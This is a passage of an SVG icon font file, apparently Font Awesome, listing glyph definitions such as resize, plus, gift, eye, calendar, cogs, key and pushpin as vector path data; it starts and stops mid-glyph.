t-13.5 30t-10.5 24q-127 285 -127 451q0 199 53 333q162 403 875 403h224v256q0 26 19 45t45 19t45 -19l512 -512q19 -19 19 -45z" />
    <glyph glyph-name="resize_full" unicode="&#xf065;" 
d="M755 480q0 -13 -10 -23l-332 -332l144 -144q19 -19 19 -45t-19 -45t-45 -19h-448q-26 0 -45 19t-19 45v448q0 26 19 45t45 19t45 -19l144 -144l332 332q10 10 23 10t23 -10l114 -114q10 -10 10 -23zM1536 1344v-448q0 -26 -19 -45t-45 -19t-45 19l-144 144l-332 -332
q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l332 332l-144 144q-19 19 -19 45t19 45t45 19h448q26 0 45 -19t19 -45z" />
    <glyph glyph-name="resize_small" unicode="&#xf066;" 
d="M768 576v-448q0 -26 -19 -45t-45 -19t-45 19l-144 144l-332 -332q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l332 332l-144 144q-19 19 -19 45t19 45t45 19h448q26 0 45 -19t19 -45zM1523 1248q0 -13 -10 -23l-332 -332l144 -144q19 -19 19 -45t-19 -45
t-45 -19h-448q-26 0 -45 19t-19 45v448q0 26 19 45t45 19t45 -19l144 -144l332 332q10 10 23 10t23 -10l114 -114q10 -10 10 -23z" />
    <glyph glyph-name="plus" unicode="&#xf067;" horiz-adv-x="1408" 
d="M1408 800v-192q0 -40 -28 -68t-68 -28h-416v-416q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v416h-416q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h416v416q0 40 28 68t68 28h192q40 0 68 -28t28 -68v-416h416q40 0 68 -28t28 -68z" />
    <glyph glyph-name="minus" unicode="&#xf068;" horiz-adv-x="1408" 
d="M1408 800v-192q0 -40 -28 -68t-68 -28h-1216q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h1216q40 0 68 -28t28 -68z" />
    <glyph glyph-name="asterisk" unicode="&#xf069;" horiz-adv-x="1664" 
d="M1482 486q46 -26 59.5 -77.5t-12.5 -97.5l-64 -110q-26 -46 -77.5 -59.5t-97.5 12.5l-266 153v-307q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v307l-266 -153q-46 -26 -97.5 -12.5t-77.5 59.5l-64 110q-26 46 -12.5 97.5t59.5 77.5l266 154l-266 154
q-46 26 -59.5 77.5t12.5 97.5l64 110q26 46 77.5 59.5t97.5 -12.5l266 -153v307q0 52 38 90t90 38h128q52 0 90 -38t38 -90v-307l266 153q46 26 97.5 12.5t77.5 -59.5l64 -110q26 -46 12.5 -97.5t-59.5 -77.5l-266 -154z" />
    <glyph glyph-name="exclamation_sign" unicode="&#xf06a;" 
d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM896 161v190q0 14 -9 23.5t-22 9.5h-192q-13 0 -23 -10t-10 -23v-190q0 -13 10 -23t23 -10h192
q13 0 22 9.5t9 23.5zM894 505l18 621q0 12 -10 18q-10 8 -24 8h-220q-14 0 -24 -8q-10 -6 -10 -18l17 -621q0 -10 10 -17.5t24 -7.5h185q14 0 23.5 7.5t10.5 17.5z" />
    <glyph glyph-name="gift" unicode="&#xf06b;" 
d="M928 180v56v468v192h-320v-192v-468v-56q0 -25 18 -38.5t46 -13.5h192q28 0 46 13.5t18 38.5zM472 1024h195l-126 161q-26 31 -69 31q-40 0 -68 -28t-28 -68t28 -68t68 -28zM1160 1120q0 40 -28 68t-68 28q-43 0 -69 -31l-125 -161h194q40 0 68 28t28 68zM1536 864v-320
q0 -14 -9 -23t-23 -9h-96v-416q0 -40 -28 -68t-68 -28h-1088q-40 0 -68 28t-28 68v416h-96q-14 0 -23 9t-9 23v320q0 14 9 23t23 9h440q-93 0 -158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5q107 0 168 -77l128 -165l128 165q61 77 168 77q93 0 158.5 -65.5t65.5 -158.5
t-65.5 -158.5t-158.5 -65.5h440q14 0 23 -9t9 -23z" />
    <glyph glyph-name="leaf" unicode="&#xf06c;" horiz-adv-x="1792" 
d="M1280 832q0 26 -19 45t-45 19q-172 0 -318 -49.5t-259.5 -134t-235.5 -219.5q-19 -21 -19 -45q0 -26 19 -45t45 -19q24 0 45 19q27 24 74 71t67 66q137 124 268.5 176t313.5 52q26 0 45 19t19 45zM1792 1030q0 -95 -20 -193q-46 -224 -184.5 -383t-357.5 -268
q-214 -108 -438 -108q-148 0 -286 47q-15 5 -88 42t-96 37q-16 0 -39.5 -32t-45 -70t-52.5 -70t-60 -32q-43 0 -63.5 17.5t-45.5 59.5q-2 4 -6 11t-5.5 10t-3 9.5t-1.5 13.5q0 35 31 73.5t68 65.5t68 56t31 48q0 4 -14 38t-16 44q-9 51 -9 104q0 115 43.5 220t119 184.5
t170.5 139t204 95.5q55 18 145 25.5t179.5 9t178.5 6t163.5 24t113.5 56.5l29.5 29.5t29.5 28t27 20t36.5 16t43.5 4.5q39 0 70.5 -46t47.5 -112t24 -124t8 -96z" />
    <glyph glyph-name="fire" unicode="&#xf06d;" horiz-adv-x="1408" 
d="M1408 -160v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1152 896q0 -78 -24.5 -144t-64 -112.5t-87.5 -88t-96 -77.5t-87.5 -72t-64 -81.5t-24.5 -96.5q0 -96 67 -224l-4 1l1 -1
q-90 41 -160 83t-138.5 100t-113.5 122.5t-72.5 150.5t-27.5 184q0 78 24.5 144t64 112.5t87.5 88t96 77.5t87.5 72t64 81.5t24.5 96.5q0 94 -66 224l3 -1l-1 1q90 -41 160 -83t138.5 -100t113.5 -122.5t72.5 -150.5t27.5 -184z" />
    <glyph glyph-name="eye_open" unicode="&#xf06e;" horiz-adv-x="1792" 
d="M1664 576q-152 236 -381 353q61 -104 61 -225q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 121 61 225q-229 -117 -381 -353q133 -205 333.5 -326.5t434.5 -121.5t434.5 121.5t333.5 326.5zM944 960q0 20 -14 34t-34 14q-125 0 -214.5 -89.5
t-89.5 -214.5q0 -20 14 -34t34 -14t34 14t14 34q0 86 61 147t147 61q20 0 34 14t14 34zM1792 576q0 -34 -20 -69q-140 -230 -376.5 -368.5t-499.5 -138.5t-499.5 139t-376.5 368q-20 35 -20 69t20 69q140 229 376.5 368t499.5 139t499.5 -139t376.5 -368q20 -35 20 -69z" />
    <glyph glyph-name="eye_close" unicode="&#xf070;" horiz-adv-x="1792" 
d="M555 201l78 141q-87 63 -136 159t-49 203q0 121 61 225q-229 -117 -381 -353q167 -258 427 -375zM944 960q0 20 -14 34t-34 14q-125 0 -214.5 -89.5t-89.5 -214.5q0 -20 14 -34t34 -14t34 14t14 34q0 86 61 147t147 61q20 0 34 14t14 34zM1307 1151q0 -7 -1 -9
q-106 -189 -316 -567t-315 -566l-49 -89q-10 -16 -28 -16q-12 0 -134 70q-16 10 -16 28q0 12 44 87q-143 65 -263.5 173t-208.5 245q-20 31 -20 69t20 69q153 235 380 371t496 136q89 0 180 -17l54 97q10 16 28 16q5 0 18 -6t31 -15.5t33 -18.5t31.5 -18.5t19.5 -11.5
q16 -10 16 -27zM1344 704q0 -139 -79 -253.5t-209 -164.5l280 502q8 -45 8 -84zM1792 576q0 -35 -20 -69q-39 -64 -109 -145q-150 -172 -347.5 -267t-419.5 -95l74 132q212 18 392.5 137t301.5 307q-115 179 -282 294l63 112q95 -64 182.5 -153t144.5 -184q20 -34 20 -69z
" />
    <glyph glyph-name="warning_sign" unicode="&#xf071;" horiz-adv-x="1792" 
d="M1024 161v190q0 14 -9.5 23.5t-22.5 9.5h-192q-13 0 -22.5 -9.5t-9.5 -23.5v-190q0 -14 9.5 -23.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 23.5zM1022 535l18 459q0 12 -10 19q-13 11 -24 11h-220q-11 0 -24 -11q-10 -7 -10 -21l17 -457q0 -10 10 -16.5t24 -6.5h185
q14 0 23.5 6.5t10.5 16.5zM1008 1469l768 -1408q35 -63 -2 -126q-17 -29 -46.5 -46t-63.5 -17h-1536q-34 0 -63.5 17t-46.5 46q-37 63 -2 126l768 1408q17 31 47 49t65 18t65 -18t47 -49z" />
    <glyph glyph-name="plane" unicode="&#xf072;" horiz-adv-x="1408" 
d="M1376 1376q44 -52 12 -148t-108 -172l-161 -161l160 -696q5 -19 -12 -33l-128 -96q-7 -6 -19 -6q-4 0 -7 1q-15 3 -21 16l-279 508l-259 -259l53 -194q5 -17 -8 -31l-96 -96q-9 -9 -23 -9h-2q-15 2 -24 13l-189 252l-252 189q-11 7 -13 23q-1 13 9 25l96 97q9 9 23 9
q6 0 8 -1l194 -53l259 259l-508 279q-14 8 -17 24q-2 16 9 27l128 128q14 13 30 8l665 -159l160 160q76 76 172 108t148 -12z" />
    <glyph glyph-name="calendar" unicode="&#xf073;" horiz-adv-x="1664" 
d="M128 -128h288v288h-288v-288zM480 -128h320v288h-320v-288zM128 224h288v320h-288v-320zM480 224h320v320h-320v-320zM128 608h288v288h-288v-288zM864 -128h320v288h-320v-288zM480 608h320v288h-320v-288zM1248 -128h288v288h-288v-288zM864 224h320v320h-320v-320z
M512 1088v288q0 13 -9.5 22.5t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-288q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1248 224h288v320h-288v-320zM864 608h320v288h-320v-288zM1248 608h288v288h-288v-288zM1280 1088v288q0 13 -9.5 22.5t-22.5 9.5h-64
q-13 0 -22.5 -9.5t-9.5 -22.5v-288q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1664 1152v-1280q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47
h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
    <glyph glyph-name="random" unicode="&#xf074;" horiz-adv-x="1792" 
d="M666 1055q-60 -92 -137 -273q-22 45 -37 72.5t-40.5 63.5t-51 56.5t-63 35t-81.5 14.5h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224q250 0 410 -225zM1792 256q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v192q-32 0 -85 -0.5t-81 -1t-73 1
t-71 5t-64 10.5t-63 18.5t-58 28.5t-59 40t-55 53.5t-56 69.5q59 93 136 273q22 -45 37 -72.5t40.5 -63.5t51 -56.5t63 -35t81.5 -14.5h256v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23zM1792 1152q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5
v192h-256q-48 0 -87 -15t-69 -45t-51 -61.5t-45 -77.5q-32 -62 -78 -171q-29 -66 -49.5 -111t-54 -105t-64 -100t-74 -83t-90 -68.5t-106.5 -42t-128 -16.5h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224q48 0 87 15t69 45t51 61.5t45 77.5q32 62 78 171q29 66 49.5 111
t54 105t64 100t74 83t90 68.5t106.5 42t128 16.5h256v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23z" />
    <glyph glyph-name="comment" unicode="&#xf075;" horiz-adv-x="1792" 
d="M1792 640q0 -174 -120 -321.5t-326 -233t-450 -85.5q-70 0 -145 8q-198 -175 -460 -242q-49 -14 -114 -22q-17 -2 -30.5 9t-17.5 29v1q-3 4 -0.5 12t2 10t4.5 9.5l6 9t7 8.5t8 9q7 8 31 34.5t34.5 38t31 39.5t32.5 51t27 59t26 76q-157 89 -247.5 220t-90.5 281
q0 130 71 248.5t191 204.5t286 136.5t348 50.5q244 0 450 -85.5t326 -233t120 -321.5z" />
    <glyph glyph-name="magnet" unicode="&#xf076;" 
d="M1536 704v-128q0 -201 -98.5 -362t-274 -251.5t-395.5 -90.5t-395.5 90.5t-274 251.5t-98.5 362v128q0 26 19 45t45 19h384q26 0 45 -19t19 -45v-128q0 -52 23.5 -90t53.5 -57t71 -30t64 -13t44 -2t44 2t64 13t71 30t53.5 57t23.5 90v128q0 26 19 45t45 19h384
q26 0 45 -19t19 -45zM512 1344v-384q0 -26 -19 -45t-45 -19h-384q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h384q26 0 45 -19t19 -45zM1536 1344v-384q0 -26 -19 -45t-45 -19h-384q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h384q26 0 45 -19t19 -45z" />
    <glyph glyph-name="chevron_up" unicode="&#xf077;" horiz-adv-x="1792" 
d="M1683 205l-166 -165q-19 -19 -45 -19t-45 19l-531 531l-531 -531q-19 -19 -45 -19t-45 19l-166 165q-19 19 -19 45.5t19 45.5l742 741q19 19 45 19t45 -19l742 -741q19 -19 19 -45.5t-19 -45.5z" />
    <glyph glyph-name="chevron_down" unicode="&#xf078;" horiz-adv-x="1792" 
d="M1683 728l-742 -741q-19 -19 -45 -19t-45 19l-742 741q-19 19 -19 45.5t19 45.5l166 165q19 19 45 19t45 -19l531 -531l531 531q19 19 45 19t45 -19l166 -165q19 -19 19 -45.5t-19 -45.5z" />
    <glyph glyph-name="retweet" unicode="&#xf079;" horiz-adv-x="1920" 
d="M1280 32q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-8 0 -13.5 2t-9 7t-5.5 8t-3 11.5t-1 11.5v13v11v160v416h-192q-26 0 -45 19t-19 45q0 24 15 41l320 384q19 22 49 22t49 -22l320 -384q15 -17 15 -41q0 -26 -19 -45t-45 -19h-192v-384h576q16 0 25 -11l160 -192q7 -10 7 -21
zM1920 448q0 -24 -15 -41l-320 -384q-20 -23 -49 -23t-49 23l-320 384q-15 17 -15 41q0 26 19 45t45 19h192v384h-576q-16 0 -25 12l-160 192q-7 9 -7 20q0 13 9.5 22.5t22.5 9.5h960q8 0 13.5 -2t9 -7t5.5 -8t3 -11.5t1 -11.5v-13v-11v-160v-416h192q26 0 45 -19t19 -45z
" />
    <glyph glyph-name="shopping_cart" unicode="&#xf07a;" horiz-adv-x="1664" 
d="M640 0q0 -52 -38 -90t-90 -38t-90 38t-38 90t38 90t90 38t90 -38t38 -90zM1536 0q0 -52 -38 -90t-90 -38t-90 38t-38 90t38 90t90 38t90 -38t38 -90zM1664 1088v-512q0 -24 -16.5 -42.5t-40.5 -21.5l-1044 -122q13 -60 13 -70q0 -16 -24 -64h920q26 0 45 -19t19 -45
t-19 -45t-45 -19h-1024q-26 0 -45 19t-19 45q0 11 8 31.5t16 36t21.5 40t15.5 29.5l-177 823h-204q-26 0 -45 19t-19 45t19 45t45 19h256q16 0 28.5 -6.5t19.5 -15.5t13 -24.5t8 -26t5.5 -29.5t4.5 -26h1201q26 0 45 -19t19 -45z" />
    <glyph glyph-name="folder_close" unicode="&#xf07b;" horiz-adv-x="1664" 
d="M1664 928v-704q0 -92 -66 -158t-158 -66h-1216q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h672q92 0 158 -66t66 -158z" />
    <glyph glyph-name="folder_open" unicode="&#xf07c;" horiz-adv-x="1920" 
d="M1879 584q0 -31 -31 -66l-336 -396q-43 -51 -120.5 -86.5t-143.5 -35.5h-1088q-34 0 -60.5 13t-26.5 43q0 31 31 66l336 396q43 51 120.5 86.5t143.5 35.5h1088q34 0 60.5 -13t26.5 -43zM1536 928v-160h-832q-94 0 -197 -47.5t-164 -119.5l-337 -396l-5 -6q0 4 -0.5 12.5
t-0.5 12.5v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h544q92 0 158 -66t66 -158z" />
    <glyph glyph-name="resize_vertical" unicode="&#xf07d;" horiz-adv-x="768" 
d="M704 1216q0 -26 -19 -45t-45 -19h-128v-1024h128q26 0 45 -19t19 -45t-19 -45l-256 -256q-19 -19 -45 -19t-45 19l-256 256q-19 19 -19 45t19 45t45 19h128v1024h-128q-26 0 -45 19t-19 45t19 45l256 256q19 19 45 19t45 -19l256 -256q19 -19 19 -45z" />
    <glyph glyph-name="resize_horizontal" unicode="&#xf07e;" horiz-adv-x="1792" 
d="M1792 640q0 -26 -19 -45l-256 -256q-19 -19 -45 -19t-45 19t-19 45v128h-1024v-128q0 -26 -19 -45t-45 -19t-45 19l-256 256q-19 19 -19 45t19 45l256 256q19 19 45 19t45 -19t19 -45v-128h1024v128q0 26 19 45t45 19t45 -19l256 -256q19 -19 19 -45z" />
    <glyph glyph-name="bar_chart" unicode="&#xf080;" horiz-adv-x="2048" 
d="M640 640v-512h-256v512h256zM1024 1152v-1024h-256v1024h256zM2048 0v-128h-2048v1536h128v-1408h1920zM1408 896v-768h-256v768h256zM1792 1280v-1152h-256v1152h256z" />
    <glyph glyph-name="twitter_sign" unicode="&#xf081;" 
d="M1280 926q-56 -25 -121 -34q68 40 93 117q-65 -38 -134 -51q-61 66 -153 66q-87 0 -148.5 -61.5t-61.5 -148.5q0 -29 5 -48q-129 7 -242 65t-192 155q-29 -50 -29 -106q0 -114 91 -175q-47 1 -100 26v-2q0 -75 50 -133.5t123 -72.5q-29 -8 -51 -8q-13 0 -39 4
q21 -63 74.5 -104t121.5 -42q-116 -90 -261 -90q-26 0 -50 3q148 -94 322 -94q112 0 210 35.5t168 95t120.5 137t75 162t24.5 168.5q0 18 -1 27q63 45 105 109zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5
t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="facebook_sign" unicode="&#xf082;" 
d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-188v595h199l30 232h-229v148q0 56 23.5 84t91.5 28l122 1v207q-63 9 -178 9q-136 0 -217.5 -80t-81.5 -226v-171h-200v-232h200v-595h-532q-119 0 -203.5 84.5t-84.5 203.5v960
q0 119 84.5 203.5t203.5 84.5h960z" />
    <glyph glyph-name="camera_retro" unicode="&#xf083;" horiz-adv-x="1792" 
d="M928 704q0 14 -9 23t-23 9q-66 0 -113 -47t-47 -113q0 -14 9 -23t23 -9t23 9t9 23q0 40 28 68t68 28q14 0 23 9t9 23zM1152 574q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM128 0h1536v128h-1536v-128zM1280 574q0 159 -112.5 271.5
t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5zM256 1216h384v128h-384v-128zM128 1024h1536v118v138h-828l-64 -128h-644v-128zM1792 1280v-1280q0 -53 -37.5 -90.5t-90.5 -37.5h-1536q-53 0 -90.5 37.5t-37.5 90.5v1280
q0 53 37.5 90.5t90.5 37.5h1536q53 0 90.5 -37.5t37.5 -90.5z" />
    <glyph glyph-name="key" unicode="&#xf084;" horiz-adv-x="1792" 
d="M832 1024q0 80 -56 136t-136 56t-136 -56t-56 -136q0 -42 19 -83q-41 19 -83 19q-80 0 -136 -56t-56 -136t56 -136t136 -56t136 56t56 136q0 42 -19 83q41 -19 83 -19q80 0 136 56t56 136zM1683 320q0 -17 -49 -66t-66 -49q-9 0 -28.5 16t-36.5 33t-38.5 40t-24.5 26
l-96 -96l220 -220q28 -28 28 -68q0 -42 -39 -81t-81 -39q-40 0 -68 28l-671 671q-176 -131 -365 -131q-163 0 -265.5 102.5t-102.5 265.5q0 160 95 313t248 248t313 95q163 0 265.5 -102.5t102.5 -265.5q0 -189 -131 -365l355 -355l96 96q-3 3 -26 24.5t-40 38.5t-33 36.5
t-16 28.5q0 17 49 66t66 49q13 0 23 -10q6 -6 46 -44.5t82 -79.5t86.5 -86t73 -78t28.5 -41z" />
    <glyph glyph-name="cogs" unicode="&#xf085;" horiz-adv-x="1920" 
d="M896 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1664 128q0 52 -38 90t-90 38t-90 -38t-38 -90q0 -53 37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 1152q0 52 -38 90t-90 38t-90 -38t-38 -90q0 -53 37.5 -90.5t90.5 -37.5
t90.5 37.5t37.5 90.5zM1280 731v-185q0 -10 -7 -19.5t-16 -10.5l-155 -24q-11 -35 -32 -76q34 -48 90 -115q7 -11 7 -20q0 -12 -7 -19q-23 -30 -82.5 -89.5t-78.5 -59.5q-11 0 -21 7l-115 90q-37 -19 -77 -31q-11 -108 -23 -155q-7 -24 -30 -24h-186q-11 0 -20 7.5t-10 17.5
l-23 153q-34 10 -75 31l-118 -89q-7 -7 -20 -7q-11 0 -21 8q-144 133 -144 160q0 9 7 19q10 14 41 53t47 61q-23 44 -35 82l-152 24q-10 1 -17 9.5t-7 19.5v185q0 10 7 19.5t16 10.5l155 24q11 35 32 76q-34 48 -90 115q-7 11 -7 20q0 12 7 20q22 30 82 89t79 59q11 0 21 -7
l115 -90q34 18 77 32q11 108 23 154q7 24 30 24h186q11 0 20 -7.5t10 -17.5l23 -153q34 -10 75 -31l118 89q8 7 20 7q11 0 21 -8q144 -133 144 -160q0 -8 -7 -19q-12 -16 -42 -54t-45 -60q23 -48 34 -82l152 -23q10 -2 17 -10.5t7 -19.5zM1920 198v-140q0 -16 -149 -31
q-12 -27 -30 -52q51 -113 51 -138q0 -4 -4 -7q-122 -71 -124 -71q-8 0 -46 47t-52 68q-20 -2 -30 -2t-30 2q-14 -21 -52 -68t-46 -47q-2 0 -124 71q-4 3 -4 7q0 25 51 138q-18 25 -30 52q-149 15 -149 31v140q0 16 149 31q13 29 30 52q-51 113 -51 138q0 4 4 7q4 2 35 20
t59 34t30 16q8 0 46 -46.5t52 -67.5q20 2 30 2t30 -2q51 71 92 112l6 2q4 0 124 -70q4 -3 4 -7q0 -25 -51 -138q17 -23 30 -52q149 -15 149 -31zM1920 1222v-140q0 -16 -149 -31q-12 -27 -30 -52q51 -113 51 -138q0 -4 -4 -7q-122 -71 -124 -71q-8 0 -46 47t-52 68
q-20 -2 -30 -2t-30 2q-14 -21 -52 -68t-46 -47q-2 0 -124 71q-4 3 -4 7q0 25 51 138q-18 25 -30 52q-149 15 -149 31v140q0 16 149 31q13 29 30 52q-51 113 -51 138q0 4 4 7q4 2 35 20t59 34t30 16q8 0 46 -46.5t52 -67.5q20 2 30 2t30 -2q51 71 92 112l6 2q4 0 124 -70
q4 -3 4 -7q0 -25 -51 -138q17 -23 30 -52q149 -15 149 -31z" />
    <glyph glyph-name="comments" unicode="&#xf086;" horiz-adv-x="1792" 
d="M1408 768q0 -139 -94 -257t-256.5 -186.5t-353.5 -68.5q-86 0 -176 16q-124 -88 -278 -128q-36 -9 -86 -16h-3q-11 0 -20.5 8t-11.5 21q-1 3 -1 6.5t0.5 6.5t2 6l2.5 5t3.5 5.5t4 5t4.5 5t4 4.5q5 6 23 25t26 29.5t22.5 29t25 38.5t20.5 44q-124 72 -195 177t-71 224
q0 139 94 257t256.5 186.5t353.5 68.5t353.5 -68.5t256.5 -186.5t94 -257zM1792 512q0 -120 -71 -224.5t-195 -176.5q10 -24 20.5 -44t25 -38.5t22.5 -29t26 -29.5t23 -25q1 -1 4 -4.5t4.5 -5t4 -5t3.5 -5.5l2.5 -5t2 -6t0.5 -6.5t-1 -6.5q-3 -14 -13 -22t-22 -7
q-50 7 -86 16q-154 40 -278 128q-90 -16 -176 -16q-271 0 -472 132q58 -4 88 -4q161 0 309 45t264 129q125 92 192 212t67 254q0 77 -23 152q129 -71 204 -178t75 -230z" />
    <glyph glyph-name="thumbs_up_alt" unicode="&#xf087;" 
d="M256 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 768q0 51 -39 89.5t-89 38.5h-352q0 58 48 159.5t48 160.5q0 98 -32 145t-128 47q-26 -26 -38 -85t-30.5 -125.5t-59.5 -109.5q-22 -23 -77 -91q-4 -5 -23 -30t-31.5 -41t-34.5 -42.5
t-40 -44t-38.5 -35.5t-40 -27t-35.5 -9h-32v-640h32q13 0 31.5 -3t33 -6.5t38 -11t35 -11.5t35.5 -12.5t29 -10.5q211 -73 342 -73h121q192 0 192 167q0 26 -5 56q30 16 47.5 52.5t17.5 73.5t-18 69q53 50 53 119q0 25 -10 55.5t-25 47.5q32 1 53.5 47t21.5 81zM1536 769
q0 -89 -49 -163q9 -33 9 -69q0 -77 -38 -144q3 -21 3 -43q0 -101 -60 -178q1 -139 -85 -219.5t-227 -80.5h-36h-93q-96 0 -189.5 22.5t-216.5 65.5q-116 40 -138 40h-288q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5h274q36 24 137 155q58 75 107 128
q24 25 35.5 85.5t30.5 126.5t62 108q39 37 90 37q84 0 151 -32.5t102 -101.5t35 -186q0 -93 -48 -192h176q104 0 180 -76t76 -179z" />
    <glyph glyph-name="thumbs_down_alt" unicode="&#xf088;" 
d="M256 1088q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 512q0 35 -21.5 81t-53.5 47q15 17 25 47.5t10 55.5q0 69 -53 119q18 31 18 69q0 37 -17.5 73.5t-47.5 52.5q5 30 5 56q0 85 -49 126t-136 41h-128q-131 0 -342 -73q-5 -2 -29 -10.5
t-35.5 -12.5t-35 -11.5t-38 -11t-33 -6.5t-31.5 -3h-32v-640h32q16 0 35.5 -9t40 -27t38.5 -35.5t40 -44t34.5 -42.5t31.5 -41t23 -30q55 -68 77 -91q41 -43 59.5 -109.5t30.5 -125.5t38 -85q96 0 128 47t32 145q0 59 -48 160.5t-48 159.5h352q50 0 89 38.5t39 89.5z
M1536 511q0 -103 -76 -179t-180 -76h-176q48 -99 48 -192q0 -118 -35 -186q-35 -69 -102 -101.5t-151 -32.5q-51 0 -90 37q-34 33 -54 82t-25.5 90.5t-17.5 84.5t-31 64q-48 50 -107 127q-101 131 -137 155h-274q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5
h288q22 0 138 40q128 44 223 66t200 22h112q140 0 226.5 -79t85.5 -216v-5q60 -77 60 -178q0 -22 -3 -43q38 -67 38 -144q0 -36 -9 -69q49 -73 49 -163z" />
    <glyph glyph-name="star_half" unicode="&#xf089;" horiz-adv-x="896" 
d="M832 1504v-1339l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41z" />
    <glyph glyph-name="heart_empty" unicode="&#xf08a;" horiz-adv-x="1792" 
d="M1664 940q0 81 -21.5 143t-55 98.5t-81.5 59.5t-94 31t-98 8t-112 -25.5t-110.5 -64t-86.5 -72t-60 -61.5q-18 -22 -49 -22t-49 22q-24 28 -60 61.5t-86.5 72t-110.5 64t-112 25.5t-98 -8t-94 -31t-81.5 -59.5t-55 -98.5t-21.5 -143q0 -168 187 -355l581 -560l580 559
q188 188 188 356zM1792 940q0 -221 -229 -450l-623 -600q-18 -18 -44 -18t-44 18l-624 602q-10 8 -27.5 26t-55.5 65.5t-68 97.5t-53.5 121t-23.5 138q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5
q224 0 351 -124t127 -344z" />
    <glyph glyph-name="signout" unicode="&#xf08b;" horiz-adv-x="1664" 
d="M640 96q0 -4 1 -20t0.5 -26.5t-3 -23.5t-10 -19.5t-20.5 -6.5h-320q-119 0 -203.5 84.5t-84.5 203.5v704q0 119 84.5 203.5t203.5 84.5h320q13 0 22.5 -9.5t9.5 -22.5q0 -4 1 -20t0.5 -26.5t-3 -23.5t-10 -19.5t-20.5 -6.5h-320q-66 0 -113 -47t-47 -113v-704
q0 -66 47 -113t113 -47h288h11h13t11.5 -1t11.5 -3t8 -5.5t7 -9t2 -13.5zM1568 640q0 -26 -19 -45l-544 -544q-19 -19 -45 -19t-45 19t-19 45v288h-448q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h448v288q0 26 19 45t45 19t45 -19l544 -544q19 -19 19 -45z" />
    <glyph glyph-name="linkedin_sign" unicode="&#xf08c;" 
d="M237 122h231v694h-231v-694zM483 1030q-1 52 -36 86t-93 34t-94.5 -34t-36.5 -86q0 -51 35.5 -85.5t92.5 -34.5h1q59 0 95 34.5t36 85.5zM1068 122h231v398q0 154 -73 233t-193 79q-136 0 -209 -117h2v101h-231q3 -66 0 -694h231v388q0 38 7 56q15 35 45 59.5t74 24.5
q116 0 116 -157v-371zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="pushpin" unicode="&#xf08d;" horiz-adv-x="1152" 
d="M480 672v448q0 14 -9 23t-23 9t-23 -9t-9 -23v-448q0 -14 9 -23t23 -9t23 9t9 23zM1152 320q0 -26 -19 -45t-45 -19h-429l-51 -483q-2 -12 -10.5 -20.5t-20.5 -8.5h-1q-27 0 -32 27l-76 485h-404q-26 0 -45 19t-19 45q0 123 78.5 221.5t177.5 98.5v512q-52 0 -90 38
